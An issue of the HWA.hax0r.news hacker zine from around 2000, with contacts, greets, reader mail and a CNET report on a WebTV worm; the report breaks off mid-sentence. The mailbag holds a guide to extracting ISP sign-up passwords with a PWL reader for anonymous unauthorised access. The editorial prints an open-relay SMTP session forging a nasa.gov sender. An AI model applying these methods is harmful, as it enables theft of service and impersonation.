more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=

@HWA'99, 2000




00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/



THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email

cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD


** USE NO HOOKS **


Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>

cruciphux@dok.org

Cruciphux [C*:.] HWA/DoK Since 1989



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:


HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5



WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "
hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5"
disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.


Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc


If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news

@HWA



00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)


Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen


Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations



Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland



Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...


@HWA



01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/


Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


New members/affiliates

Xistence ..... General news and Dutch/German translations

sP|a|Zm ..... Swedish news / translations

SugarKing ..... General news articles


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs*
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
theduece ytcracker loophole BlkOps
MostHated vetesgirl Slash bob-
CHEVY* Debris pr1zm JimJones
Dragos Ruiu pr0xy MR^CHAOS Eckis
Fuqrag Messiah v00d00 meliksah
dinkee omnihil sP|a|Zm OE
KillNow iPulse erikR prizm
paluka Xistence doobee phold hi ;)
{} mixter merXor abattis
Xistence

#darknet #feed-the-goats #EUA #IBT the b0f crew etc fuck I

/storm/ did you do it yet? ;-) i'll get your shit in here
soon.. promise :)


shouts to Xochitl13 for sending the cool postcard with a pic
of the la 2600 meeting place. cheers dude!


Folks from #hwa.hax0r,news and other leet secret channels,
*grin* - mad props! ... ;-)

And many others, sorry if i missed you or forgot you! mail
me and i'll flail myself unforgivingly in front of my open
bedroom window until I bleed, then maybe, add u to the list
(please, don't ask for pics...)

Also mad props to doobee and the CCC (Chaos Computer Club)
in Germany for setting up a new listserv system to help
distribute the zine. (Will be in action soon, I have admin
work to do first and testruns..).

:-)))



Ken Williams/tattooman ex-of PacketStorm,

SpaceRogue for running a kick ass news net

Emmanuel Goldstein for pure staying power

All the crackers, hackers and phreakers

The sysadmins, NOC controllers, network engineers
IRCops, security professionals, tiger team operatives
military cyberwar grunts, feds and 'special computer
unit' coppers trying to keep shit together in this
anarchic chaos.

AND

Kevin Mitnick (free at last, stay free this time man...)

Kevin was released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/

Recently reported 'helping' out the feds with security advice!




kewl sites:

+ http://hackdesk.dhs.org/ NEW -> NEWBIE help + MORE
+ http://www.hack.co.za **DOWN **
EfNet channel: #darknet


+ http://blacksun.box.sk.
+ http://packetstorm.securify.com/
+ http://www.securityportal.com/
+ http://www.securityfocus.com/
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://www.pure-security.net/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/




"What is popular isn't always right, and what is right isn't
always popular..."

- FProphet '99




Since we provide only the links in this section, be prepared
for 404's - Ed


+++ When was the last time you backed up your important data?

++ http://zcaofficedirectory.com/
Beware of "pay-per-call" Area Code 809 SCAM!
Do not respond to e-mails, phone calls, or pages which inform you
to call Caribbean Islands Area Code " 809 " phone number.
If you call from the United States, you will be apparently be charged
$25.00 per minute (without being warned beforehand).
It's important to prevent becoming a victim of this SCAM.
Check all area codes before returning a call.




Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** NEW WEB BOARD! ***

========================================================================

The message board has been REVIVED with a new script and is doing quite
well. Check it out


http://discserver.snap.com/Indices/103991.html
.

Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed

=======================================================================

* An interesting usenet email with a cool telephony URL to check out: *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 25 Feb 2000 12:33:09 -0600
From: "Jennifer 'AstroJenn' Martino" <jennmartino@my-deja.com>
Subject: Re: HWA.hax0r.news Underground Security
Organization: Not today. Not yesterday. And probably not tomorrow.
To: Cruciphux <cruciphux@my-deja.com>
Reply To: jennmartino@my-deja.com

i have a few phone sounds that you might be interested in..

cycle tone sweeper, switch verification messages, unidentifiable
messages, those recordings that say a bunch of numbers, spit out touch
tones and hang up, test messages, etc.

less interesting than the above, but i also have recordings of some odd
error messages, loops, blue box tones, red box tones, touch tones,
ccitt5, a call from a jail.

when applicable, the filename is the actual phone number i called to
recieve the sound.

unfortunately they are not in ram nor mp3 formats but..

you can find my collection at

hope that helps,
jenn
--
The Web Page You Have Reached http://twpyhr.usuck.com
Over 225 telephone sounds. Home to "The Unofficial Touch Tone Tunes
FAQ"
"The Phoney Dance. A collection of telephone graphics.

Jenn's Joint http://jennsays.usuck.com
My Ob-Personal Page.


-=-

Freebie net hack ... these things are everywhere now, if you can't get
net access for free or dirt cheap you're paranoid or living under a
rock :-) ... of course remember, you get what you pay for - Ed



From: M* H* <m*h*@????????.nl>
To: <cruciphux@dok.org>
Sent: Friday, March 24, 2000 9:58 AM
Subject: submission


I wrote this text just know, thought it might be usefull (dont use my
realname or something plz).

Grtz,

m-m

-------------------------------------------------------------------------------


************************************************************
* HOW TO GET FREE (READ: ANONYMOUS) INTERNET ACCESS *
* m-m <email: michiel@unbounded.com> *
************************************************************


YOU'LL NEED:
Windoze (I'm sorry!)
A PWL Reader (TIP: get the demo version of pwltool @ www.webdon.com)
One of them ISP CD's with the M$ Internet Connection Wizzard

HOW DOES IT WORK:

For the ones that don't know that the internet connection wizzard is, i'll
explain quickly. Since ISP's are constantly dying to get new members, they
(sometimes) give away free CD's with magazines and stuff. All ICW does is
make a temporary connnection to a server, get some HTML, run Internet
Explorer in fullscreen and have you fill in some stupid forms which will
be CGI'd to the administration so you'll get your internet accout... and
the bill. Filling in false info can be usefull, but won't work long + it's
illegal.

For the temporary connection to the server ICW just makes a new Dial-up
connection. So what you need to do is just boot up one of them
CD's, make that connection, alt+tab away and use the PWL Reader to get the
temporary info for the account.

Cancel your subscribing and throw away the CD. The connection gets deleted
from your dialup's automaticly to prevent such abuse.

Load up your normal internet connection and go to that ISP's website. Go
for technical support and get the nearest PoP. (Read: telephone
number to log in).

Now make a new dialup connection with that number and the login name and
password you just earned with the PWL reader. Voilla. You're
connected. (Note: these are usually guest/g

  
uest or stuff like that).

Try reaching a external website (i.a. www.news.insource.nl). If can't
connect it probably means the ISP was smart and blocked all external
traffic for the sign up account.

I've tried this on several ISP's and it worked most of the time. Some
ISP's were smart enough to block such jokes but some weren't. Since
free internet is a fact these days this is only usefull to remain
anonymous. (if you're hacking or something).

<SNIP>

end of email

-=-




From: Dragos Ruiu <dr@dursec.com>
To: <*>
Sent: Thursday, March 23, 2000 10:53 PM
Subject: kyxspam: hnn hacked?


After fielding TV reporter questions on the subject...
I tried to go see what HNN had to say about Max,
and www.hackernews.com got me a page that said:

<html>
<head>
<title>
White House
</title>
</head>
<body bgcolor=white>
White House WhiteHouse White House
<SCRIPT LANGUAGE = "JavaScript">
window.location = "http://www.whitehouse.com";
</SCRIPT>
WHite House<br>

<h1><a href="White">http://www.whitehouse.com">White House</a></h1>

</body>
</html>

... definitely not what I was looking for ....

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver

Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com


-=-

Editor's note: this hack is unconfirmed and was not mentioned on HNN (curious) possibly
a dns grab, unknown at this time ... i'd have expected HNN to acknowledge any hacks
successful or not. Site whitehouse.com is a porn site... take that as you will.

-=-


From: Mr. Unknown <mr_unknown10@hotmail.com>
To: <cruciphux@dok.org>
Sent: Wednesday, March 22, 2000 7:18 PM


First I want to say the zine is kickass.
SugarKing pointed me to the lastest one. Read it last nite at work. That
really sux that Fuqrag was raided. I work at a place where he did a
defacement and maybe some other stuff. ;) Since then, I have been
interested about what else he was doing. Only could catch the latest
defacements, though. I get a good laugh at work when the servers go down<of
course NT> and say "FUQRAG IS BACK!" They freak! haa haa so funny it
really pisses them off. They won't listen to me about our networks security
since I am only a pc tech. and they are big MSCE's. I thought MSCE's had to
know their shit? They set up a ftp server and told everyone that it didn't
allow anonymous log in, ha, should've seen their faces when some good pics
should up in their personal directories. After they still hadn't figured out
who it was, I told them how to fix that problem. What do you know, the next
day my admin rights were gone,<can't even add machines to the domain> and
the test account another admin setup for me was gone. Even showed them
problems with asp. It's just pissing them off and they are not doing
anything about it. Not even patching old holes. Very discouraging for me,
when I can show them how to fix their shit. You would think after being
hacked they would do something. reading the interview with fuqrag was some
kewl shit. I hope they take it easy on em. I hope he writes some articles
for the zine, too. Anyway I just wanted to let you know that the zine kicks
ass and content is good. I wish to be as 313373 as fuqrag!!

Keep up the great work

mr.unknown
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com


-=-

The kind of mail we love getting ... :-) - Ed


And some interesting SPAM ?!?


<headers toasted>


Dear Web Master,

Do you want to know how your computer skills rate?

Take a FREE Brainbench certification exam ONLINE and find
out how good your IT skills really are.

Everyday, thousands of technical professionals take a FREE
Brainbench certification exam online to rate their skills.
They use the test results to get a better understanding of
their strengths and weaknesses or to earn a certification
that helps them get a better job. It only takes a moment to
register online for an exam. You will then immediately
receive your FREE test access code, which will allow you to
take the multiple-choice exam anytime within the next 30
days. Register NOW at
http://destinationsite.com/c?c=71838.2597.0.3128.0

If you pass the exam, Brainbench will certify your skill and
mail you an attractive 81/2" x 11" certificate FREE! Plus
you can make your certification available online if you
choose. As the world's leading skills certification
authority, Brainbench certifications are recognized by major
employers and staffing organizations throughout the world.

============================================================
Register for any FREE exam NOW and
automatically enter a monthly drawing for $500.
http://destinationsite.com/c?c=71838.2597.0.3128.1
Take advantage of this great offer!
Pass it along to your friends!
Brainbench has 60 different exams to choose from!
============================================================

How does it work?
1) Register for an exam at
http://destinationsite.com/c?c=71838.2597.0.3128.2
There are about 60 exams to choose from. You will receive
instructions on how to complete the exam when you register.
2) When it is convenient for you, enter your test code at
the Brainbench website. You will take the multiple-choice
exam online. It will take about 45 minutes. You can take
it ANYTIME from ANYPLACE using a common web browser.
(version 3.0 or later preferred).
3) As soon as you finish the exam, you can view your test
results including your skill rating
(on a scale of 1.00 - 5.00) with a list of your strengths
and weaknesses.
To certify you need a score of 2.75 or higher.
To certify as a Master, you need a score of 4.00 or
higher.
The test engine is computer-adaptive, meaning it will
adjust to your skill level so whether you are a novice or
an expert, it will ask questions that are close to your
skill level.
4) All your information is held private unless you allow it
to be released.

Who recognizes Brainbench certifications?
1) Virtually all employers recognize Brainbench
certifications- we are the leading independent
certification authority with over 500,000 exams ordered
last year!
2) Top technology companies and top staffing companies use
Brainbench exams to screen their technical staffs,
including: Ernst & Young, EDS, CSC,
PriceWaterhouseCoopers, kforce.com, JP Morgan and many
others.
3) Due to Brainbench's secure adaptive-testing method,
employer's trust the Brainbench approach to validating
a job candidate's skills.

What does it mean to be certified?
1) It means you join the ranks of those professionals who
can prove that they have the credentials to do a job.
Employers will be more likely to put their trust in you.
2) You can pursue, with confidence, the jobs you want.
3) Whether you pass or not, every time you take the test
you will receive a private report on your strengths and
weaknesses as well your personal ranking in the industry.

Is it really FREE?
Yes. There is absolutely NO CHARGE to you. You can take the
exam FREE. We'll mail your certificate, FREE. There are no
hidden costs. We are doing this because we want to grow the
number of people who receive the benefit of a Brainbench
certification exam. We will eventually charge people to
take the exam, but for now it is FREE. So enjoy, and
please- pass this on to your friends.

Register now for your FREE exam: at
http://destinationsite.com/c?c=71838.2597.0.3128.3


Mike Littman
Cofounder, Brainbench, The skills authority


-=-

From: <S*P*@*.?????.*.com>
To: <cruciphux@dok.org>
Sent: Saturday, March 18, 2000 5:42 AM
Subject: Need a hand? ... I mean, Help?


Hello, there...
I came across your HWA newsletter. I read you are looking for help.
I have no clue about hacking and all the magic that you guys do. I can tell
you it fascinate me, and I've been reading attrition for quite a while. I
work with computers
(as in: Dummy 101 . Can't expect much from blondes...*ugh*)

I'm originally from Italy. So, If you ever came across something to
translate from Italian to English I would be more than happy to help you out.
I'd like to keep a very-very low profile. No profile at all would even be
better.
Just my 2 Cents.
You're doing a wonderful job...
Ciao, ciao
Simona

-=-

Don't usually post these, but just to prove we do get offers of help
so don't sit there get up and do something too! :-)) - Ed

-=-

Using cablemodem? especially on the @HOME network? expect weird shit
the teething problems aren't over .. heres an interesting diatribe
from Dragos on some recent @home-isms ... - Ed

:

From: Dragos Ruiu <dr@dursec.com>
To: <*>
Sent: Monday, March 20, 2000 11:58 PM
Subject: kyxquestions: @home puke


Here are more puzzles for all you armchair hacker sleuths...

In the last two days my cablemodem has started spewing ICMP Host Unreachable
packets from a local 10.11.* address to seemingly random addresses but each
address is repeated multiple times. Most of the dest hosts are in 207.230.246.*
We are talking about lots of packets here... every couple of min.

This was preceeded by the unusual occurrence of 10.11.* -> 10.11.* traffic.
Which was followed by mapping and poking at random 10.11.* addresses
from varied addresses. 10.11 is where @ home puts their cablemodems.
As to why I would be seeing this stuff on the client side of my cablemodem
that's a good question - expecially those 10.11 -> 10.11 packets. I haven't
ruled out some flaky modem or router yet blasting garbage into the ether, and
@home has been having to "reboot their servers" a lot lately.

Other wierd stuff is broadcasts from 10.11.* hosts on port 121 to subnet
broadcast addresses.

Looking back into the logs shows that this kind ICMP storm has happened in the
past weeks on and off a couple of times. Interestingly, before today... the
destination was always in the 172.16.*.* address space. Each time, the activity
starts, is heavily active and then stops within minutes.... only today it seems
to be going on and not abating and it seems to like destinations of
207.230.246.[170,253] (what looks like a name server {woop, woop, danger will
robinson} and a test box at vsb.bc.ca and 24.112.31.56 and 172.16.6.195 (no
reverse dns lookup avail) as it's favorite destinations. Todays activity seems
to all come from one cablemodem and the activity in the past seemed to vary in
source modem address. The single source says to me that it may just
be one flaky modem.

Now I gotta go and find where the whois registry for the ca domain hides.

Miscelaneous crud:

24.113.85.105 cr547339-a.surrey1.bc.wave.home.com which seems to be running
some sort of port-1080-wingate sort of thing has been trying to log in to an ftp
server here, when he oughtn't.

And lots and lots of the typical wingate scans and along with oodles of the not
so common yet Trin00/TrojanCow/DeepThroat 3.1 traffic/scans. Anybody got
a good rundown/synopsis of DeepThroat or Trojan Cow they can point me to?
I have to go see what ArachNIDS says. BTW for those that are keeping score
Trojan Cow seems to be the winner in the number of hosts infected dept.
if the # of different sources of the broadcasts and volume are any indication.

Bottom line:

Something is wierd and new. We also had a runaway lynx process on one
server.... now I hear there is a new remote overflow in it (Safer) - but that is
just circumstancial evidence. That plus another potentially false outbound xterm
trigger all leads to the old spidey senses saying... fee fi fo fum... I smell
hacking.

P.p.s. for Max and the rules guys... outbound nmap TCP connect scans seem to
false the "AOL chat data" rules in snort, not sure if that's in vision.conf or
rapidnet set yet but I find this a useful falsing that lets me log outbound
nmaps I initiate. :-)

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - April 10-12 Vancouver

Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

-=-



* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~

(Didn't pull any from the board, check it out, some interesting
stuff on there... - Ed)



@HWA


02.0 From the editor.
~~~~~~~~~~~~~~~~

_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|



#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/* Another monthly release... oh well read on.
*
*
* Cruci
*
* cruciphux@dok.org
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/

printf ("EoF.\n");
}




Snailmail:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5


Anonymous email:

telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT

If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied

or

550 admin@nasa.gov... Domain must exist

etc.



* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)

-=-



Congrats, thanks, articles, news submissions and kudos to us at the

main address: cruciphux@dok.org complaints and all nastygrams and

mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,

private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start


____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|




-= start =--= start =--= start =--= start =--= start =--= start =--=




03.0 Clearing up a nasty screw up in issue #51, here's what happened...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I fucked up. Two 'versions' of #51 were actually released, a few early birds
got the "bad" copy. The 'real' copy has (2) in the upper left very top corner.

Collectors edition!

:-)

Details? nah you wouldn't be interested anyways....

-=-

@HWA


04.0 HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NOTE:

I had a gracious offer from *someone* the last time HACK.CO.ZA needed
hosting but unfortunately my mailbox had corrupted and I lost this
message before I could forward it to the site owner Gov-Boi, if after
reading this you can still offer services, please send another email
to me at cruciphux@dok.org... thanks!


@HWA


05.0 WebTV hit by "Melissa-Type" virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by: Merxenary
Source: C|Net

http://news.cnet.com/news/0-1006-200-1576095.html?tag=st.ne.1002.


WebTV hit by Melissa-like bug
By Stephanie Miles
Staff Writer, CNET News.com
March 17, 2000, 3:55 p.m. PT

WebTV has been hit by a self-replicating bug that is wreaking havoc
with the network's message boards and newsgroups, a situation that
knocks back the company's claim that it is immune to viruses and
security holes.

The problem, which some are calling the "Flood Virus," gets inside
the e-mail system of WebTV owners and prompts the WebTV settop box
to litter bulletin board and newsgroup sites on the company's
network with redundant junk mail. Like the Melissa virus, the
malicious WebTV code sends out the emails under a user's name
without their knowledge.

Melissa-type viruses cause damage by clogging email servers of
corporations and organizations with illegitimate emails. For
WebTV users, the chief problem so far has come in trying to read
the intra-network web sites. Bulletin boards on the WebTV network
only show five postings at a time. An outbreak of the Flood Virus
therefore makes it very difficult for users to find relevant
messages on the board.

Subscribers also face potential embarrassment, as emails under
their name are posted to newsgroups without their knowledge.

Microsoft, which owns WebTV, has confirmed the existence of the
problem but claims the situation is a hack rather than a virus.
The company added that the problem is not widespread.

Whatever the root cause of the problem, the situation is black eye
for the service. One of WebTV's marketing pitches has been that
subscribers do not have to worry about rogue viruses on the Internet.

Microsoft also has had a tempestuous relationship with segments of
its subscriber base over technological issues in the past. After
gaining attention as the first firm to offer Internet service through
the television, WebTV has struggled to build its subscriber base and
has encountered criticism from users for failing to support standard
Web technologies such as Java. The company was acquired by Microsoft
in 1997.

WebTV was recently forced to reverse course and remove banner ads
from emails viewed and stored on the site in response to a flood of
customer complaints. The backlash comes as WebTV faces a looming
challenge from Internet service giant America Online, which is set
to launch its AOL TV sometime this summer.

The problem was first discovered by Net4TV, which tracks interactive
television. Net4TV came up with the Flood Virus name.

"It's absolutely self-replicating. It inserts the virus code into the
signature upon opening the email or going to the newsgroup," said
Brian Bock, editor in chief at Net4TV.

The general public does not have to worry about the flaw. It can only
come in e-mails from WebTV units and it only effects other WebTV boxes.
In addition, all of the excess mail is currently being directed at
newsgroups and bulletin boards on the company's network.

The WebTV network is written mainly in HTML, and the company uses HTML
shortcuts for certain network features, according to Net4TV. Shortcuts
within user's email signature files, the calling card at the bottom of
an e-mail message, serve as the entryway for the malicious code. The
code manipulates the signature file and then prompts the Web TV unit
to post repeatedly to WebTV newsgroups.

WebTV representatives could not confirm this account of how the network
is set up. Nonetheless, they acknowledged it exists.

"It's a fundamental flaw in the WebTV architecture," Bock said.

Although WebTV currently counts about one million subscribers, Microsoft
is marketing portions of the service along with its TV Pak to cable
service providers as Microsoft TV. If portions of the WebTV browser are
easily susceptible to these types of attacks, Bock said, it does not bode
well for Microsoft TV if it is installed on a widespread basis through
cable providers.

"It points to a larger problem," he said, calling for an independent
security analysis of the WebTV architecture, similar to that which took
place with Microsoft's Hotmail free email service after suffering repeated
privacy breaches. "It points to what else may be going on under there."

For its part, WebTV says the problem has only hit a very small number of
WebTV Classic users. According to Microsoft, hackers combined two known
WebTV hacks: one which inserts malicious code into the user's email
signature file, and one which inserts malicious code into postings on
the newsgroup itself.

"These two codes were linked together," a spokesperson said, asserting
that only 14 of the 594,000 WebTV Classic users have reported being
infected with the bug. WebTV had previously created fixes for the two
